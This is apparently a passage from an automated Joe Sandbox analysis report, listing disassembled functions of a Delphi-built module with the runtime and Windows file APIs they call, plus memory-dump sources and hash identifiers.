                                                                                                  • Opcode Fuzzy Hash: b2b830a017bee59d4e872495292ad1b13696414d59f0388ff4c3bb92921b499a
                                                                                                  • Instruction Fuzzy Hash: CCF02EB174569053F75191AC5CA1BDF51CA4BC5551F994336BF0CCB342EE70CC0082C6
                                                                                                  Function 5002688C Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002689B
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,500268EC,?,?,?,?,00000000), ref: 500268C0
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500268EC,?,?,?,?,00000000), ref: 500268CB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20MetaRecxiStringStringpx14Stringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2203270808-0
                                                                                                  • Opcode ID: ccc7b6e6f2e119070dd8617dd0e382500ae0a435e3e97db025f3ba1d8bace3fb
                                                                                                  • Instruction ID: 62b2d6722134464f4681b16f86bc22ffda435385ec3fff5c8aa35c22120bf3af
                                                                                                  • Opcode Fuzzy Hash: ccc7b6e6f2e119070dd8617dd0e382500ae0a435e3e97db025f3ba1d8bace3fb
                                                                                                  • Instruction Fuzzy Hash: 48F0C275600689AFE700CF94EC51C5AB7ADEB89720B918372F90883740DB31EE01C6D0
                                                                                                  Function 500154BC Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,5001551A,?,?,?,00000000,00000000), ref: 500154DC
                                                                                                    • Part of subcall function 50019EBC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019EF5
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F08
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F13
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F1F
                                                                                                    • Part of subcall function 50019EBC: CharUpperBuffW.USER32(00000000,?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000), ref: 50019F25
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(?,00000000,5001551A,?,?,?,00000000,00000000), ref: 500154EA
                                                                                                  • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,5001551A,?,?,?,00000000,00000000), ref: 500154F3
                                                                                                    • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                    • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$String$System@@$Ansi$Char$qqrx20$From$InternalStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%Upper$Case$qqrx20Char$BuffLen$qqrr20Pos$qqrx20StringpbiStringt1
                                                                                                  • String ID:
                                                                                                  • API String ID: 1811596575-0
                                                                                                  • Opcode ID: f8655f718251c2dc71c6e2303aeecd35c5678775ca9ef57c7831b282cf33942c
                                                                                                  • Instruction ID: c0b1a5ea2b56544e033e8cc658cc13535f1bdf9ea375e6b9a9d5c146db7ca2d2
                                                                                                  • Opcode Fuzzy Hash: f8655f718251c2dc71c6e2303aeecd35c5678775ca9ef57c7831b282cf33942c
                                                                                                  • Instruction Fuzzy Hash: 74F0E936705744AFEB01CAE4DC51B9DB7EDDB48210F518572F900D7341D6749E0086D4
                                                                                                  Function 5001C5A4 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5C7
                                                                                                    • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                    • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                  • @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5D5
                                                                                                    • Part of subcall function 500286A0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286AB
                                                                                                    • Part of subcall function 500286A0: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286C5
                                                                                                    • Part of subcall function 500286A0: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286D5
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5E0
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$Stringx20Sysutils@$Delimiter$qqrx20$Asg$qqrr20Path$Cat$qqrr20Cat3$qqrr20Copy$qqrx20ExtractFileIncludeLastName$qqrx20StringiStringiiStringt1Stringt2Trailing
                                                                                                  • String ID:
                                                                                                  • API String ID: 4289416924-0
                                                                                                  • Opcode ID: cbb00767dfdef57c8a6a94f2a97003c90a3088f6f5a0bed04f05ac7a6cd57dea
                                                                                                  • Instruction ID: 57fd14a13350398e88c99b23b071614aa93d96e5052488e5150640dac515cbaf
                                                                                                  • Opcode Fuzzy Hash: cbb00767dfdef57c8a6a94f2a97003c90a3088f6f5a0bed04f05ac7a6cd57dea
                                                                                                  • Instruction Fuzzy Hash: ABF0BE35305384ABE711DAA5EC51E8AB7ADEBC9620FA14666B904E3341D974EE0085A4
                                                                                                  Function 5002889C Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288BC
                                                                                                    • Part of subcall function 50019F4C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019FD0), ref: 50019F85
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019FD0), ref: 50019F98
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019FD0), ref: 50019FA3
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019FD0), ref: 50019FAF
                                                                                                    • Part of subcall function 50019F4C: CharLowerBuffW.USER32(00000000,?,00000000,50019FD0), ref: 50019FB5
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288CA
                                                                                                  • @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288D3
                                                                                                    • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019BF4
                                                                                                    • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C09
                                                                                                    • Part of subcall function 50019BD4: @System@@LStrArrayClr$qqrpvi.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C5A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$Ansi$From$LowerStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Case$qqrx20CharChar$qqrx20$ArrayBuffClr$qqrpviCompareInternalLen$qqrr20Str$qqrx20StringpbiStringt1
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714845271-0
                                                                                                  • Opcode ID: 5ad6f6ad8a74d05bca40f67ae65e425fd22752f68b44519822e8c10b39ad4a31
                                                                                                  • Instruction ID: 3b1375f16a59b80594c295dcd8003e2593a585a6f493d83d981e7d870c7d49f9
                                                                                                  • Opcode Fuzzy Hash: 5ad6f6ad8a74d05bca40f67ae65e425fd22752f68b44519822e8c10b39ad4a31
                                                                                                  • Instruction Fuzzy Hash: EBF08936705344BFDB01DAE4ED51BDEB7EDDF48610F5145B2F900D3641D6749E408694
                                                                                                  Function 500265E8 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20MetaRecxiStringStringpx14Stringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2203270808-0
                                                                                                  • Opcode ID: 8a06c8108bb7d8ccefdc9901acd0eb074360c6541fd827dabcbd55e415eef1b7
                                                                                                  • Instruction ID: 5c853f4ed2ac0c9bc1a77cb935357e7c10a3e6514227e9817a7166fb08a22db9
                                                                                                  • Opcode Fuzzy Hash: 8a06c8108bb7d8ccefdc9901acd0eb074360c6541fd827dabcbd55e415eef1b7
                                                                                                  • Instruction Fuzzy Hash: D6F0B431605589AFD710CA94EC52D5EB7ADEB8A660FA18372F90893640DA31AE05C691
                                                                                                  Function 5001BC10 Relevance: 6.0, APIs: 4, Instructions: 36timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?), ref: 5001BC21
                                                                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 5001BC27
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,00000000,?), ref: 5001BC3E
                                                                                                  • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001BC4F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileTime$AttributesChar$qqrx20DateLocalStringSystem@System@@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 621471433-0
                                                                                                  • Opcode ID: 11ddeee012ef72541587c81d2c4f6ae2ffdcb67a1e5da0485f11f4257ba00eeb
                                                                                                  • Instruction ID: 2ec93d420f7fcb1b567d715506b069df497adf6230f9334c837aee8c9b07c3bb
                                                                                                  • Opcode Fuzzy Hash: 11ddeee012ef72541587c81d2c4f6ae2ffdcb67a1e5da0485f11f4257ba00eeb
                                                                                                  • Instruction Fuzzy Hash: 6BF0BD72A0528DA6DB11EAE4DD85EDFB3BCAB04210F404766B914E3182EB74AA0457D0
                                                                                                  Function 50021698 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216C2
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216CA
                                                                                                  • @Sysutils@TextToFloat$qqrpcpv20Sysutils@TFloatValuerx24Sysutils@TFormatSettings.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216D3
                                                                                                    • Part of subcall function 50021580: @System@FPower10$qqrv.RTL120 ref: 50021606
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(500216F7,?,?,?,00000000), ref: 500216EA
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$Sysutils@$AnsiStringSystem@%$Char$qqrr27Char$qqrx27Clr$qqrpvFloatFloat$qqrpcpv20FormatFreeFromMem$qqrpvPower10$qqrvSettingsSystem@T$us$i0$%T$us$i0$%pbusTextValuerx24
                                                                                                  • String ID:
                                                                                                  • API String ID: 3176001047-0
                                                                                                  • Opcode ID: 096e108351b0c95bdd88cef74aa5ff209f8a2702cfba72334109f8fd92193702
                                                                                                  • Instruction ID: 9fd13c48b86fe8ba40560011224ed825752708d08ad58dc217336ba303494022
                                                                                                  • Opcode Fuzzy Hash: 096e108351b0c95bdd88cef74aa5ff209f8a2702cfba72334109f8fd92193702
                                                                                                  • Instruction Fuzzy Hash: 43F02731305244ABE704CAA5FC61A9EB7EEEFE9640FA64176F505C3741DA70AD018694
                                                                                                  Function 50028834 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,5002888D,?,?,?,00000000,00000000), ref: 50028854
                                                                                                    • Part of subcall function 50019F4C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019FD0), ref: 50019F85
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019FD0), ref: 50019F98
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019FD0), ref: 50019FA3
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019FD0), ref: 50019FAF
                                                                                                    • Part of subcall function 50019F4C: CharLowerBuffW.USER32(00000000,?,00000000,50019FD0), ref: 50019FB5
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,5002888D,?,?,?,00000000,00000000), ref: 50028862
                                                                                                  • @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,5002888D,?,?,?,00000000,00000000), ref: 5002886B
                                                                                                    • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019BF4
                                                                                                    • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C09
                                                                                                    • Part of subcall function 50019BD4: @System@@LStrArrayClr$qqrpvi.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C5A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$Ansi$From$LowerStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Case$qqrx20CharChar$qqrx20$ArrayBuffClr$qqrpviCompareInternalLen$qqrr20Str$qqrx20StringpbiStringt1
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714845271-0
                                                                                                  • Opcode ID: 305cfe6e8fe4599ad0224e3db809e64d7292e10cee766da07364fbdc4708b33c
                                                                                                  • Instruction ID: 78bc52d133ef3eee87fb56faae3835f84c1f75803b4e5c0fcda7dd3ba297cfd4
                                                                                                  • Opcode Fuzzy Hash: 305cfe6e8fe4599ad0224e3db809e64d7292e10cee766da07364fbdc4708b33c
                                                                                                  • Instruction Fuzzy Hash: 5CF05E39705688BBEB01DAA4EC91F9EB7EDDB88610F9186B2F500D7641E674AE008694
                                                                                                  Function 50026914 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026923
                                                                                                  • @Sysutils@LoadStr$qqri.RTL120(00000000,5002696D,?,?,?,?,00000000), ref: 50026941
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002696D,?,?,?,?,00000000), ref: 5002694C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
